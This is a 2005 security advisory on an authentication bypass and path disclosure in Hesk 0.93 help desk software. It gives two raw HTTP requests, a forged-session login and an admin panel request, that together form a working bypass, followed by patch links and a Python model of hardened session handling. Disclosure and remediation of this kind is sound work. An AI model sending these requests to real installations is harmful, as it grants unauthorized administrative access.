
OS2A_1003.txt

23 Sep 2005 00:00:00 · Reported by Rajesh Sethumadhavan · Type: packetstorm · Source: packetstormsecurity.com

Hesk authentication bypass and path disclosure vulnerabilities

OS2A
  
Hesk Session ID Validation Vulnerability  
  
  
OS2A ID: OS2A_1003

Status:
9/13/2005 Issue Discovered
9/14/2005 Reported to the vendor
9/18/2005 Patch Released
9/20/2005 Advisory Released
  
  
Class: Authentication Bypass
Severity: CRITICAL
  
  
Overview:
Hesk is PHP-based help desk software that runs on a MySQL database.
It allows a ticket-based support system (helpdesk) to be set up for websites.
Hesk versions 0.93 and prior are vulnerable to authentication bypass and path
disclosure vulnerabilities caused by improper validation of the session ID
carried in the HTTP Cookie header ('PHPSESSID'). These vulnerabilities can be
exploited to bypass the authentication mechanism and to make the application
reveal system-specific information (installation paths).
  
  
Description:
Multiple vulnerabilities exist in the Hesk ticket-based support system.

1. Authentication Bypass
The session ID supplied in the 'PHPSESSID' cookie of the HTTP request is not
properly validated. A malicious user can log in to the administrator account by
sending an arbitrary value in the 'PHPSESSID' cookie along with a login POST to
admin.php; the submitted user ID and password do not need to be valid. The same
session ID can then be used to access the administrative control panel
(admin_main.php).

This is similar to a previously reported vulnerability in which an invalid
user ID and password were submitted. In this case, a randomly chosen
session ID is sent along with the login request.
  
2. Path Disclosure
Path information is disclosed in error pages when metacharacters such as "'" or
"<" are passed in the 'PHPSESSID' cookie of the HTTP request.
  
  
Impact:
Successful exploitation can result in compromise of the application and
disclosure of system-specific information.
  
Affected Systems:  
Hesk 0.93 and prior.  
Linux (Any), Unix (Any), Windows (Any)  
  
Exploit:
1. HTTP POST login request with a randomly chosen session ID. The value 12345 in
the Cookie header is arbitrary, the user ID and password are bogus, and the
/hesk/ path matches the Referer and should be adjusted to the target installation:

POST /hesk/admin.php HTTP/1.1
Host: host_ip
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.7)
Accept: text/xml,application/xml,application/xhtml+xml,text/html
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://host_ip/hesk/admin.php
Cookie: PHPSESSID=12345
Content-Type: application/x-www-form-urlencoded
Content-Length: 27

user=1&pass=sdfd&a=do_login

2. GET request to the administrative control panel, carrying the same session ID:

GET /hesk/admin_main.php HTTP/1.1
Host: host_ip
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.7)
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Cookie: PHPSESSID=12345
  
Solutions:
Apply the vendor patch:
http://www.phpjunkyard.com/extras/hesk_0931_patch.zip
OR upgrade to Hesk 0.93.1 from
http://www.phpjunkyard.com/free-helpdesk-software.php
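The advisory does not show Hesk's code or what the vendor patch changed, so the following is an added example (not Hesk's code and not the patch) of the session-handling properties that close both issues: a client-supplied session ID is validated against the allowed character set and, if the server never issued it, ignored rather than adopted; the session becomes privileged only after the credentials verify; and the ID is regenerated at that point. The admin account, password and the SessionManager/Session names are constructed for the example.

```python
"""Session handling that closes both issues in OS2A_1003, modelled in Python.

Added example, not Hesk's code or the vendor's patch (the advisory does not
show either). The admin account and password below are constructed sample
data.
"""
import hashlib
import hmac
import re
import secrets
from dataclasses import dataclass
from typing import Dict, Optional

# Character set PHP accepts for session ids. Anything else is treated as
# "no session" here instead of being passed on to produce an error page,
# which is what leaked the path in the advisory.
SID_RE = re.compile(r"[A-Za-z0-9,-]{22,128}")


@dataclass
class Session:
    user: Optional[str] = None   # set only after a verified login


class SessionManager:
    def __init__(self, admin_password_hashes: Dict[str, str]):
        # user -> sha256 hex digest; a real application would use a slow
        # password hash (bcrypt/argon2), this keeps the example self-contained.
        self._admins = admin_password_hashes
        self._sessions: Dict[str, Session] = {}

    def _issue(self, session: Session) -> str:
        sid = secrets.token_hex(32)   # 64 hex chars, within SID_RE
        self._sessions[sid] = session
        return sid

    def start(self, client_sid: Optional[str]) -> str:
        """Resume a server-issued session or issue a fresh id (strict mode).

        An id the server never issued, such as PHPSESSID=12345, is not
        adopted, so the client cannot choose the id its session will carry.
        """
        if client_sid and SID_RE.fullmatch(client_sid) and client_sid in self._sessions:
            return client_sid
        return self._issue(Session())

    def login(self, sid: str, user: str, password: str) -> str:
        """Verify credentials. On failure the session stays as it was; on
        success the session is marked and moved to a newly generated id."""
        expected = self._admins.get(user)
        supplied = hashlib.sha256(password.encode()).hexdigest()
        if expected is None or not hmac.compare_digest(expected, supplied):
            return sid
        session = self._sessions.pop(sid, Session())
        session.user = user
        return self._issue(session)

    def is_admin(self, sid: str) -> bool:
        """The check admin_main.php needs: a server-issued, verified session."""
        session = self._sessions.get(sid)
        return session is not None and session.user is not None


def demo() -> Dict[str, bool]:
    """Replay the advisory's sequence against the hardened manager."""
    mgr = SessionManager({"admin": hashlib.sha256(b"correct horse").hexdigest()})
    sid = mgr.start("12345")                       # step 1: forged PHPSESSID
    after_bad = mgr.login(sid, "1", "sdfd")        # bogus credentials, as in the advisory
    after_good = mgr.login(sid, "admin", "correct horse")
    return {
        "forged_id_adopted": sid == "12345",
        "admin_after_bad_login": mgr.is_admin(after_bad),
        "admin_after_good_login": mgr.is_admin(after_good),
        "id_rotated_on_login": after_good != sid,
        "metachar_id_rejected": mgr.start("'") != "'",
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

In PHP terms these correspond to validating the cookie value before session_start(), running with session.use_strict_mode enabled so unknown IDs are not adopted, and calling session_regenerate_id() only after the password check has passed; keeping display_errors off in production removes the error-page channel for the path leak independently of the ID validation.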
  
Credits:
Rajesh Sethumadhavan, Rahul Mohandas, and Jayesh K.S of OS2A discovered
the vulnerability.
